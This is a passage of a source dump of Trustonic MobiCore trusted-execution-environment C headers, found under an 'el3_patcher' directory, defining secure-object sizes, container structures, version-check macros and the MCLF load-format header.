| /** Size of hash used for secure objects v2. */ 198 | #define MC_SO_HASH_SIZE 32 199 | 200 | /** Size of hash used for secure object v2.1. */ 201 | #define MC_SO21_HASH_SIZE 24 202 | /** Size of random used for secure objects v2.1. */ 203 | #define MC_SO21_RND_SIZE 9 204 | 205 | /** Size of hash used for secure object v2.2. */ 206 | #define MC_SO22_HASH_SIZE 32 207 | /** Size of random used for secure objects v2.2. */ 208 | #define MC_SO22_RND_SIZE 16 209 | 210 | /** Hash size for current generated wrapping */ 211 | #define MC_SO2X_HASH_SIZE MC_SO22_HASH_SIZE 212 | /** Random size for current generated wrapping */ 213 | #define MC_SO2X_RND_SIZE MC_SO22_RND_SIZE 214 | 215 | #define MC_SO_ENCRYPT_PADDED_SIZE_F21(netsize) ( (netsize) + \ 216 | MC_SO_MAX_PADDING_SIZE - (netsize) % MC_SO_MAX_PADDING_SIZE ) 217 | 218 | #if SO_USE_VERSION_22 219 | // No encryption padding at all. 220 | #else 221 | /** Calculates gross size of cryptogram within secure object including ISO padding bytes. */ 222 | #define MC_SO_ENCRYPT_PADDED_SIZE(netsize) MC_SO_ENCRYPT_PADDED_SIZE_F21(netsize) 223 | #endif 224 | 225 | 226 | /** Calculates the total size of a secure object. 227 | * @param plainLen Length of plain text part within secure object. 228 | * @param encryptedLen Length of encrypted part within secure object (excl. 229 | * hash, padding). 230 | * @return Total (gross) size of the secure object or 0 if given parameters are 231 | * illegal or would lead to a secure object of invalid size. 232 | */ 233 | #define MC_SO_SIZE_F22(plainLen, encryptedLen) ( \ 234 | ((plainLen) + (encryptedLen) < (encryptedLen) || (plainLen) + (encryptedLen) > MC_SO_PAYLOAD_MAX_SIZE) ? 0 : \ 235 | sizeof(mcSoHeader_t) + (plainLen) + (encryptedLen) +MC_SO22_HASH_SIZE +MC_SO22_RND_SIZE \ 236 | ) 237 | #define MC_SO_SIZE_F21(plainLen, encryptedLen) ( \ 238 | ((plainLen) + (encryptedLen) < (encryptedLen) || (plainLen) + (encryptedLen) > MC_SO_PAYLOAD_MAX_SIZE) ? 0 : \ 239 | sizeof(mcSoHeader_t) +(plainLen) +MC_SO_ENCRYPT_PADDED_SIZE_F21((encryptedLen) +MC_SO_HASH_SIZE) \ 240 | ) 241 | 242 | #define MC_SO_SIZE(plainLen, encryptedLen) MC_SO_SIZE_F22(plainLen, encryptedLen) 243 | 244 | #endif // MC_SO_H_ 245 | 246 | -------------------------------------------------------------------------------- /el3_patcher/include/mcContainer.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2013-2015 TRUSTONIC LIMITED 3 | * All rights reserved. 4 | * 5 | * Redistribution and use in source and binary forms, with or without 6 | * modification, are permitted provided that the following conditions are met: 7 | * 8 | * 1. Redistributions of source code must retain the above copyright notice, 9 | * this list of conditions and the following disclaimer. 10 | * 11 | * 2. Redistributions in binary form must reproduce the above copyright 12 | * notice, this list of conditions and the following disclaimer in the 13 | * documentation and/or other materials provided with the distribution. 14 | * 15 | * 3. Neither the name of the TRUSTONIC LIMITED nor the names of its 16 | * contributors may be used to endorse or promote products derived from 17 | * this software without specific prior written permission. 18 | * 19 | * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 20 | * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED 21 | * TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 22 | * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR 23 | * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 24 | * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, 25 | * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; 26 | * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, 27 | * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 28 | * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF 29 | * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | */ 31 | 32 | #ifndef MC_CONTAINER_H_ 33 | #define MC_CONTAINER_H_ 34 | 35 | #include 36 | 37 | #include "mcRootid.h" 38 | #include "mcSpid.h" 39 | #include "mcUuid.h" 40 | #include "mcSo.h" 41 | #include "mcSuid.h" 42 | 43 | /** Support for trustlet container 2.1 */ 44 | #define CONTAINER_FORMAT_TL21 1 45 | 46 | #define CONTAINER_VERSION_MAJOR 2 47 | /** Support for the old format */ 48 | #ifdef CONTAINER_FORMAT_TL21 49 | #define CONTAINER_VERSION_MINOR 1 50 | #else 51 | #define CONTAINER_VERSION_MINOR 0 52 | #endif 53 | 54 | #define MC_CONT_SYMMETRIC_KEY_SIZE 32 55 | #define MC_CONT_PUBLIC_KEY_SIZE 320 56 | #define MC_CONT_CHILDREN_COUNT 16 57 | #define MC_DATA_CONT_MAX_DATA_SIZE 2048 58 | #define MC_TLT_CODE_HASH_SIZE 32 59 | 60 | #define MC_BYTES_TO_WORDS(bytes) ( (bytes) / sizeof(uint32_t) ) 61 | #define MC_ENUM_32BIT_SPACER ((int32_t)-1) 62 | 63 | typedef uint32_t mcContVersion_t; 64 | 65 | /** Personalization Data ID. */ 66 | typedef struct { 67 | uint32_t data; 68 | } mcPid_t; 69 | 70 | typedef struct { 71 | uint32_t keydata[MC_BYTES_TO_WORDS(MC_CONT_SYMMETRIC_KEY_SIZE)]; 72 | } mcSymmetricKey_t; 73 | 74 | typedef struct { 75 | uint32_t keydata[MC_BYTES_TO_WORDS(MC_CONT_PUBLIC_KEY_SIZE)]; 76 | } mcPublicKey_t; 77 | 78 | typedef mcSpid_t spChild_t[MC_CONT_CHILDREN_COUNT]; 79 | 80 | typedef mcUuid_t mcUuidChild_t[MC_CONT_CHILDREN_COUNT]; 81 | 82 | /** Content management container states. */ 83 | typedef enum { 84 | /** Container state unregistered. */ 85 | MC_CONT_STATE_UNREGISTERED = 0, 86 | /** Container is registered. */ 87 | MC_CONT_STATE_REGISTERED = 1, 88 | /** Container is activated. */ 89 | MC_CONT_STATE_ACTIVATED = 2, 90 | /** Container is locked by root. */ 91 | MC_CONT_STATE_ROOT_LOCKED = 3, 92 | /** Container is locked by service provider. */ 93 | MC_CONT_STATE_SP_LOCKED = 4, 94 | /** Container is locked by root and service provider. */ 95 | MC_CONT_STATE_ROOT_SP_LOCKED = 5, 96 | /** Dummy: ensure that enum is 32 bits wide. */ 97 | MC_CONT_ATTRIB_SPACER = MC_ENUM_32BIT_SPACER 98 | } mcContainerState_t; 99 | 100 | /** Content management container attributes. */ 101 | typedef struct { 102 | mcContainerState_t state; 103 | } mcContainerAttribs_t; 104 | 105 | /** Container types. */ 106 | typedef enum { 107 | /** SOC container. */ 108 | CONT_TYPE_SOC = 0, 109 | /** Root container. */ 110 | CONT_TYPE_ROOT = 1, 111 | /** Service provider container. */ 112 | CONT_TYPE_SP = 2, 113 | /** Trustlet container. */ 114 | CONT_TYPE_TLCON = 3, 115 | /** Service provider data. */ 116 | CONT_TYPE_SPDATA = 4, 117 | /** Trustlet data. */ 118 | CONT_TYPE_TLDATA = 5 119 | } contType_t; 120 | 121 | /** SHA256 checksum. */ 122 | typedef struct { 123 | uint8_t data[32]; 124 | } mcSha256_t; 125 | 126 | /** @defgroup MC_CONTAINER_CRYPTO_OBJECTS Container secrets. 127 | * Data that is stored encrypted within the container. 128 | */ 129 | 130 | /** SoC secret */ 131 | typedef struct { 132 | mcSymmetricKey_t kSocAuth; 133 | } mcCoSocCont_t; 134 | 135 | /** */ 136 | typedef struct { 137 | mcSymmetricKey_t kRootAuth; 138 | } mcCoRootCont_t; 139 | 140 | /** */ 141 | typedef struct { 142 | mcSymmetricKey_t kSpAuth; 143 | } mcCoSpCont_t; 144 | 145 | /** */ 146 | typedef struct { 147 | mcSymmetricKey_t kTl; 148 | } mcCoTltCont_t; 149 | 150 | /** */ 151 | typedef struct { 152 | uint8_t data[MC_DATA_CONT_MAX_DATA_SIZE]; 153 | } mcCoDataCont_t; 154 | 155 | /** */ 156 | typedef union { 157 | mcSpid_t spid; 158 | mcUuid_t uuid; 159 | } mcCid_t; 160 | 161 | /** @defgroup MC_CONTAINER_CONTAINER_OBJECTS Container definitions. 162 | * Container type definitions. 163 | */ 164 | 165 | /** SoC Container */ 166 | typedef struct { 167 | contType_t type; 168 | mcContVersion_t version; 169 | mcContainerAttribs_t attribs; 170 | mcSuid_t suid; 171 | // Secrets. 172 | mcCoSocCont_t co; 173 | } mcSocCont_t; 174 | 175 | /** */ 176 | typedef struct { 177 | contType_t type; 178 | mcContVersion_t version; 179 | mcContainerAttribs_t attribs; 180 | mcSuid_t suid; 181 | mcRootid_t rootid; 182 | spChild_t children; 183 | // Secrets. 184 | mcCoRootCont_t co; 185 | } mcRootCont_t; 186 | 187 | /** */ 188 | typedef struct { 189 | contType_t type; 190 | mcContVersion_t version; 191 | mcContainerAttribs_t attribs; 192 | mcSpid_t spid; 193 | mcUuidChild_t children; 194 | // Secrets. 195 | mcCoSpCont_t co; 196 | } mcSpCont_t; 197 | 198 | /** */ 199 | typedef struct { 200 | contType_t type; 201 | mcContVersion_t version; 202 | mcContainerAttribs_t attribs; 203 | mcSpid_t parent; 204 | mcUuid_t uuid; 205 | // Secrets. 206 | mcCoTltCont_t co; 207 | } mcTltContCommon_t; 208 | 209 | /** */ 210 | typedef struct { 211 | mcTltContCommon_t common; 212 | } mcTltCont_2_0_t; 213 | 214 | /** */ 215 | typedef struct { 216 | mcTltContCommon_t common; 217 | mcSha256_t skSpTltEnc; 218 | mcContVersion_t tltVersion; 219 | } mcTltCont_2_1_t; 220 | 221 | /** */ 222 | typedef struct { 223 | contType_t type; 224 | mcContVersion_t version; 225 | mcUuid_t uuid; 226 | mcPid_t pid; 227 | // Secrets. 228 | mcCoDataCont_t co; 229 | } mcDataCont_t; 230 | 231 | /** Helper for finding maximum value */ 232 | #define MC_MAX(x, y) (((x)<(y))?(y):(x)) 233 | 234 | /** Calculates the total size of the secure object hash and padding for a given 235 | * container. 236 | * @param contTotalSize Total size of the container (sum of plain and encrypted 237 | * parts). 238 | * @param contCoSize Size/length of the encrypted container part ("crypto 239 | * object"). 240 | * @return Total size of hash and padding for given container. 241 | */ 242 | #define SO_CONT_HASH_AND_PAD_SIZE(contTotalSize, contCoSize) \ 243 | MC_MAX( MC_SO_SIZE_F21((contTotalSize) - (contCoSize), (contCoSize)) \ 244 | - sizeof(mcSoHeader_t) - (contTotalSize), \ 245 | MC_SO_SIZE((contTotalSize) - (contCoSize), (contCoSize)) \ 246 | - sizeof(mcSoHeader_t) - (contTotalSize) ) 247 | 248 | /** @defgroup MC_CONTAINER_SECURE_OBJECTS Containers in secure objects. 249 | * Secure objects wrapping different containers. 250 | */ 251 | 252 | /** Authentication token */ 253 | typedef struct { 254 | mcSoHeader_t soHeader; 255 | mcSocCont_t coSoc; 256 | uint8_t hashAndPad[SO_CONT_HASH_AND_PAD_SIZE(sizeof(mcSocCont_t), sizeof(mcCoSocCont_t))]; 257 | } mcSoAuthTokenCont_t; 258 | 259 | /** Root container */ 260 | typedef struct { 261 | mcSoHeader_t soHeader; 262 | mcRootCont_t cont; 263 | uint8_t hashAndPad[SO_CONT_HASH_AND_PAD_SIZE(sizeof(mcRootCont_t), sizeof(mcCoRootCont_t))]; 264 | } mcSoRootCont_t; 265 | 266 | /** */ 267 | typedef struct { 268 | mcSoHeader_t soHeader; 269 | mcSpCont_t cont; 270 | uint8_t hashAndPad[SO_CONT_HASH_AND_PAD_SIZE(sizeof(mcSpCont_t), sizeof(mcCoSpCont_t))]; 271 | } mcSoSpCont_t; 272 | 273 | /** */ 274 | typedef struct { 275 | mcSoHeader_t soHeader; 276 | mcTltCont_2_0_t cont; 277 | uint8_t hashAndPad[SO_CONT_HASH_AND_PAD_SIZE(sizeof(mcTltCont_2_0_t), sizeof(mcCoTltCont_t))]; 278 | } mcSoTltCont_2_0_t; 279 | 280 | typedef struct { 281 | mcSoHeader_t soHeader; 282 | mcTltCont_2_1_t cont; 283 | uint8_t hashAndPad[SO_CONT_HASH_AND_PAD_SIZE(sizeof(mcTltCont_2_1_t), sizeof(mcCoTltCont_t))]; 284 | } mcSoTltCont_2_1_t; 285 | 286 | #ifdef CONTAINER_FORMAT_TL21 287 | typedef mcSoTltCont_2_0_t mcSoTltCont_t; 288 | #else 289 | typedef mcTltContCommon_t mcTltCont_t; 290 | 291 | typedef struct { 292 | mcSoHeader_t soHeader; 293 | mcTltCont_t cont; 294 | uint8_t hashAndPad[SO_CONT_HASH_AND_PAD_SIZE(sizeof(mcTltCont_t), sizeof(mcCoTltCont_t))]; 295 | } mcSoTltCont_t ; 296 | #endif 297 | 298 | /** */ 299 | typedef struct { 300 | mcSoHeader_t soHeader; 301 | mcDataCont_t cont; 302 | uint8_t hashAndPad[SO_CONT_HASH_AND_PAD_SIZE(sizeof(mcDataCont_t), sizeof(mcCoDataCont_t))]; 303 | } mcSoDataCont_t; 304 | 305 | /** Trustlet Blob length info */ 306 | typedef struct { 307 | uint32_t magic; /**< New blob format magic number*/ 308 | uint32_t rootContBlobSize; /**< Root container blob size */ 309 | uint32_t spContBlobSize; /**< SP container blob size */ 310 | uint32_t tlContBlobSize; /**< Tl container blob size */ 311 | uint32_t reserved[4]; /**< Reserved for further Use */ 312 | } mcBlobLenInfo_t, *mcBlobLenInfo_ptr; 313 | 314 | #define MC_TLBLOBLEN_MAGIC 0x7672746C 315 | 316 | #endif // MC_CONTAINER_H_ 317 | 318 | -------------------------------------------------------------------------------- /el3_patcher/include/mcVersionHelper.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2013-2015 TRUSTONIC LIMITED 3 | * All rights reserved. 4 | * 5 | * Redistribution and use in source and binary forms, with or without 6 | * modification, are permitted provided that the following conditions are met: 7 | * 8 | * 1. Redistributions of source code must retain the above copyright notice, 9 | * this list of conditions and the following disclaimer. 10 | * 11 | * 2. Redistributions in binary form must reproduce the above copyright 12 | * notice, this list of conditions and the following disclaimer in the 13 | * documentation and/or other materials provided with the distribution. 14 | * 15 | * 3. Neither the name of the TRUSTONIC LIMITED nor the names of its 16 | * contributors may be used to endorse or promote products derived from 17 | * this software without specific prior written permission. 18 | * 19 | * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 20 | * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED 21 | * TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 22 | * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR 23 | * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 24 | * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, 25 | * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; 26 | * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, 27 | * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 28 | * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF 29 | * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | */ 31 | 32 | #ifndef MCVERSIONHELPER_H_ 33 | #define MCVERSIONHELPER_H_ 34 | 35 | #include 36 | 37 | 38 | /** Create a version number given major and minor numbers. */ 39 | #define MC_MAKE_VERSION(major,minor) \ 40 | ( (((major) & 0xffff) << 16) |\ 41 | ((minor) & 0xffff)) 42 | 43 | /** Get major version number from complete version. */ 44 | #define MC_GET_MAJOR_VERSION(version) ((version) >> 16) 45 | 46 | /** Get minor version number from complete version. */ 47 | #define MC_GET_MINOR_VERSION(version) ((version) & 0xffff) 48 | 49 | // Asserts expression at compile-time (to be used outside a function body). 50 | #define ASSERT_VERSION_IMPLEMENTATION(comp, versionpart, requiredV, actualV, expression) \ 51 | extern int Actual_##comp##_##versionpart##_VERSION_##actualV##_does_not_match_required_version_##requiredV[(expression) ? 0:-1] 52 | 53 | #define ASSERT_VERSION_EVALUATOR(comp, versionpart, requiredV, actualV, expression) \ 54 | ASSERT_VERSION_IMPLEMENTATION(comp, versionpart, requiredV, actualV, expression) 55 | 56 | #define ASSERT_VERSION(required, comparator, comp, versionpart) \ 57 | ASSERT_VERSION_EVALUATOR(comp, versionpart, required, comp ##_VERSION_## versionpart, required comparator comp ##_VERSION_## versionpart) 58 | 59 | /** Checks at compile-time that an interface version provided by component 60 | * 'comp' is identical to the required version of a component using this interface. 61 | * Note! This check is useful for components that IMPLEMENT a particular 62 | * interface to be alerted of changes to the interface which are likely to 63 | * require adaptations in the implementation. */ 64 | #define MC_CHECK_VERSION_EQUALS(comp, major, minor) \ 65 | ASSERT_VERSION(major, ==, comp, MAJOR); \ 66 | ASSERT_VERSION(minor, ==, comp, MINOR); 67 | 68 | /** Checks at compile-time that an interface version provided by component 'comp' meets the 69 | * required version of a component using this interface. */ 70 | #define MC_CHECK_VERSION_STATIC(comp, majorRequired, minorRequired) \ 71 | ASSERT_VERSION(majorRequired, ==, comp, MAJOR); \ 72 | ASSERT_VERSION(minorRequired, <=, comp, MINOR); 73 | 74 | /** Version check helper macro for an interface consumer against an interface 75 | * provider. 76 | * @param comp Name of Interface to check. 77 | * @param majorRequired Required major version of interface provider. 78 | * @param minorRequired Required minor version of interface provider. 79 | * Performs a compile-time interface version check that comp_VERSION_MAJOR 80 | * equals majorRequired and that comp_VERSION_MINOR is at least minorRequired. 81 | * On success, compilation goes through. 82 | * On error, compilation breaks, telling the component that did not match in the 83 | * error message. 84 | * 85 | * Additionally, a function is created: 86 | * 87 | * checkVersionOk##component(uint32_t version, char** errmsg) 88 | * 89 | * Compares version against majorRequired and minorRequired. 90 | * Additionally, it creates a message string that can be printed out using printf("%s", errmsg). 91 | * It returns either only the actual version, or on mismatch, actual and required version. 92 | * 93 | * @param version[in] component version as returned by layer-specific getVersion. 94 | * @param errmsg[out] a message string that contains a log. 95 | * 96 | */ 97 | #if !defined(NDEBUG) 98 | #if !defined(TRUSTLET) 99 | #define MC_CHECK_VERSION(comp, majorRequired, minorRequired) \ 100 | MC_CHECK_VERSION_STATIC(comp, majorRequired, minorRequired) \ 101 | static uint32_t checkVersionOk##comp(uint32_t version, char** errmsg) { \ 102 | static char msgBuf[100]; \ 103 | uint32_t major = MC_GET_MAJOR_VERSION(version); \ 104 | uint32_t minor = MC_GET_MINOR_VERSION(version); \ 105 | uint32_t ret = 0; \ 106 | *errmsg = msgBuf; \ 107 | if ((major == majorRequired) && (minor >= minorRequired)) { \ 108 | snprintf(msgBuf, sizeof(msgBuf), \ 109 | #comp " version is %u.%u", major, minor); \ 110 | ret = 1; \ 111 | } else { \ 112 | snprintf(msgBuf, sizeof(msgBuf), \ 113 | #comp " version error. Got: %u.%u, want >= %u.%u", major, minor, majorRequired, minorRequired); \ 114 | } \ 115 | msgBuf[sizeof(msgBuf) - 1] = '\0'; \ 116 | return ret; \ 117 | } 118 | #else /* TRUSTLET */ 119 | #define MC_CHECK_VERSION(comp, majorRequired, minorRequired) \ 120 | MC_CHECK_VERSION_STATIC(comp, majorRequired, minorRequired) \ 121 | static uint32_t checkVersionOk##comp(uint32_t version, char** errmsg) { \ 122 | uint32_t major = MC_GET_MAJOR_VERSION(version); \ 123 | uint32_t minor = MC_GET_MINOR_VERSION(version); \ 124 | *errmsg = NULL; \ 125 | if ((major == majorRequired) && (minor >= minorRequired)) { \ 126 | tlDbgPrintf(#comp " version is %u.%u", major, minor); \ 127 | return 1; \ 128 | } else { \ 129 | tlDbgPrintf( \ 130 | #comp " version error. Got: %u.%u, want >= %u.%u", major, minor, majorRequired, minorRequired); \ 131 | } \ 132 | return 0; \ 133 | } 134 | #endif /* TRUSTLET */ 135 | #else 136 | #define MC_CHECK_VERSION(comp, majorRequired, minorRequired) \ 137 | MC_CHECK_VERSION_STATIC(comp, majorRequired, minorRequired) \ 138 | static uint32_t checkVersionOk##comp(uint32_t version, char** errmsg) { \ 139 | uint32_t major = MC_GET_MAJOR_VERSION(version); \ 140 | uint32_t minor = MC_GET_MINOR_VERSION(version); \ 141 | *errmsg = NULL; \ 142 | if ((major == majorRequired) && (minor >= minorRequired)) { \ 143 | return 1; \ 144 | }; \ 145 | return 0; \ 146 | } 147 | #endif 148 | 149 | /** Version check helper macro for version checks of a data object version 150 | * against an data object consumer. 151 | * 152 | * @param comp Name of Interface to check. 153 | * @param majorRequired Major data object version supported by component. 154 | * @param minorRequired Minor data object version supported by component. 155 | * Performs a compile-time interface version check that comp_VERSION_MAJOR 156 | * equals majorRequired and that comp_VERSION_MINOR is at least minorRequired. 157 | * On success, compilation goes through. 158 | * On error, compilation breaks, telling the component that did not match in the 159 | * error message. 160 | * 161 | * Additionally, the following function is created: 162 | * 163 | * checkVersionOkDataObject##component(uint32_t version, char** errmsg) 164 | * 165 | * This function checks that the data object version is compatible with the 166 | * interface version; that is, the major version of the data object must match 167 | * exactly and the minor version of the data object MUST BE LESS OR EQUAL to the 168 | * required interface version. 169 | * Additionally, it creates a message string that can be printed out using printf("%s", errmsg). 170 | * It returns either only the actual version, or on mismatch, actual and 171 | * provided version. 172 | * 173 | * @param version[in] Data object version of data object. 174 | * @param errmsg[out] a message string that contains a log. 175 | * 176 | */ 177 | #if !defined(NDEBUG) 178 | #if !defined(TRUSTLET) 179 | #define MC_CHECK_DATA_OBJECT_VERSION(comp, majorRequired, minorRequired) \ 180 | MC_CHECK_VERSION_STATIC(comp, majorRequired, minorRequired) \ 181 | static uint32_t checkVersionOkDataObject##comp(uint32_t version, char** errmsg) { \ 182 | static char msgBuf[100]; \ 183 | uint32_t major = MC_GET_MAJOR_VERSION(version); \ 184 | uint32_t minor = MC_GET_MINOR_VERSION(version); \ 185 | uint32_t ret = 0; \ 186 | *errmsg = msgBuf; \ 187 | if ((major == majorRequired) && (minor <= minorRequired)) { \ 188 | snprintf(msgBuf, sizeof(msgBuf), \ 189 | #comp " version is %u.%u", major, minor); \ 190 | ret = 1; \ 191 | } else { \ 192 | snprintf(msgBuf, sizeof(msgBuf), \ 193 | #comp " version error. Got: %u.%u, want <= %u.%u", major, minor, majorRequired, minorRequired); \ 194 | } \ 195 | msgBuf[sizeof(msgBuf) - 1] = '\0'; \ 196 | return ret; \ 197 | } 198 | #else /* TRUSTLET */ 199 | #define MC_CHECK_DATA_OBJECT_VERSION(comp, majorRequired, minorRequired) \ 200 | MC_CHECK_VERSION_STATIC(comp, majorRequired, minorRequired) \ 201 | static uint32_t checkVersionOkDataObject##comp(uint32_t version, char** errmsg) { \ 202 | uint32_t major = MC_GET_MAJOR_VERSION(version); \ 203 | uint32_t minor = MC_GET_MINOR_VERSION(version); \ 204 | *errmsg = NULL; \ 205 | if ((major == majorRequired) && (minor <= minorRequired)) { \ 206 | tlDbgPrintf(#comp " version is %u.%u", major, minor); \ 207 | return 1; \ 208 | } else { \ 209 | tlDbgPrintf( \ 210 | #comp " version error. Got: %u.%u, want <= %u.%u", major, minor, majorRequired, minorRequired); \ 211 | } \ 212 | return 0; \ 213 | } 214 | #endif /* TRUSTLET */ 215 | #else 216 | #define MC_CHECK_DATA_OBJECT_VERSION(comp, majorRequired, minorRequired) \ 217 | MC_CHECK_VERSION_STATIC(comp, majorRequired, minorRequired) \ 218 | static uint32_t checkVersionOkDataObject##comp(uint32_t version, char** errmsg) { \ 219 | uint32_t major = MC_GET_MAJOR_VERSION(version); \ 220 | uint32_t minor = MC_GET_MINOR_VERSION(version); \ 221 | *errmsg = NULL; \ 222 | if ((major == majorRequired) && (minor <= minorRequired)) { \ 223 | return 1; \ 224 | }; \ 225 | return 0; \ 226 | } 227 | #endif 228 | 229 | #endif // MCVERSIONHELPER_H_ 230 | 231 | -------------------------------------------------------------------------------- /el3_patcher/include/mcLoadFormat.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2013-2015 TRUSTONIC LIMITED 3 | * All rights reserved. 4 | * 5 | * Redistribution and use in source and binary forms, with or without 6 | * modification, are permitted provided that the following conditions are met: 7 | * 8 | * 1. Redistributions of source code must retain the above copyright notice, 9 | * this list of conditions and the following disclaimer. 10 | * 11 | * 2. Redistributions in binary form must reproduce the above copyright 12 | * notice, this list of conditions and the following disclaimer in the 13 | * documentation and/or other materials provided with the distribution. 14 | * 15 | * 3. Neither the name of the TRUSTONIC LIMITED nor the names of its 16 | * contributors may be used to endorse or promote products derived from 17 | * this software without specific prior written permission. 18 | * 19 | * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 20 | * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED 21 | * TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 22 | * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR 23 | * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 24 | * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, 25 | * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; 26 | * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, 27 | * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 28 | * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF 29 | * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | */ 31 | #ifndef MCLOADFORMAT_H_ 32 | #define MCLOADFORMAT_H_ 33 | 34 | #include "mcUuid.h" 35 | #include "mcSuid.h" 36 | #include "mcDriverId.h" 37 | 38 | #define MCLF_VERSION_MAJOR 2 39 | #define MCLF_VERSION_MINOR 5 40 | #define MCLF_VERSION_MINOR_CURRENT 3 41 | 42 | #define MC_SERVICE_HEADER_MAGIC_BE ((uint32_t)('M'|('C'<<8)|('L'<<16)|('F'<<24))) /**< "MCLF" in big endian integer representation */ 43 | #define MC_SERVICE_HEADER_MAGIC_LE ((uint32_t)(('M'<<24)|('C'<<16)|('L'<<8)|'F')) /**< "MCLF" in little endian integer representation */ 44 | #define MC_SERVICE_HEADER_MAGIC_STR "MCLF" /**< "MCLF" as string */ 45 | 46 | /** @name MCLF flags */ 47 | #define MC_SERVICE_HEADER_FLAGS_PERMANENT (1U << 0) /**< Loaded service cannot be unloaded from MobiCore. */ 48 | #define MC_SERVICE_HEADER_FLAGS_NO_CONTROL_INTERFACE (1U << 1) /**< Service has no WSM control interface. */ 49 | #define MC_SERVICE_HEADER_FLAGS_DEBUGGABLE (1U << 2) /**< Service can be debugged. */ 50 | #define MC_SERVICE_HEADER_FLAGS_EXTENDED_LAYOUT (1U << 3) /**< New-layout trusted application or trusted driver. */ 51 | 52 | 53 | /** Service type. 54 | * The service type defines the type of executable. 55 | */ 56 | typedef enum { 57 | SERVICE_TYPE_ILLEGAL = 0, /**< Service type is invalid. */ 58 | SERVICE_TYPE_DRIVER = 1, /**< Service is a driver. */ 59 | SERVICE_TYPE_SP_TRUSTLET = 2, /**< Service is a Trustlet. */ 60 | SERVICE_TYPE_SYSTEM_TRUSTLET = 3, /**< Service is a system Trustlet. */ 61 | SERVICE_TYPE_MIDDLEWARE = 4, /**< Service is a middleware. */ 62 | SERVICE_TYPE_LAST_ENTRY = 5, /**< marker for last entry */ 63 | } serviceType_t; 64 | 65 | /** 66 | * Memory types. 67 | */ 68 | typedef enum { 69 | MCLF_MEM_TYPE_INTERNAL_PREFERRED = 0, /**< If available use internal memory; otherwise external memory. */ 70 | MCLF_MEM_TYPE_INTERNAL = 1, /**< Internal memory must be used for executing the service. */ 71 | MCLF_MEM_TYPE_EXTERNAL = 2, /**< External memory must be used for executing the service. */ 72 | } memType_t; 73 | 74 | /** 75 | * Descriptor for a memory segment. 76 | */ 77 | typedef struct { 78 | uint32_t start; /**< Virtual start address. */ 79 | uint32_t len; /**< Length of the segment in bytes. */ 80 | } segmentDescriptor_t, *segmentDescriptor_ptr; 81 | 82 | /** 83 | * MCLF intro for data structure identification. 84 | * Must be the first element of a valid MCLF file. 85 | */ 86 | typedef struct { 87 | uint32_t magic; /**< Header magic value ASCII "MCLF". */ 88 | uint32_t version; /**< Version of the MCLF header structure. */ 89 | } mclfIntro_t, *mclfIntro_ptr; 90 | 91 | 92 | // Version 2 ///////////////////////////////////////////////////////////////////////////////////////////////////////// 93 | /** 94 | * @defgroup MCLF_VER_V2 MCLF Version 32 95 | * @ingroup MCLF_VER 96 | * 97 | * @addtogroup MCLF_VER_V2 98 | */ 99 | 100 | /** 101 | * Version 2.1/2.2 MCLF header. 102 | */ 103 | typedef struct { 104 | mclfIntro_t intro; /**< MCLF header start with the mandatory intro. */ 105 | uint32_t flags; /**< Service flags. */ 106 | memType_t memType; /**< Type of memory the service must be executed from. */ 107 | serviceType_t serviceType; /**< Type of service. */ 108 | 109 | uint32_t numInstances; /**< Number of instances which can be run simultaneously. */ 110 | mcUuid_t uuid; /**< Loadable service unique identifier (UUID). */ 111 | mcDriverId_t driverId; /**< If the serviceType is SERVICE_TYPE_DRIVER the 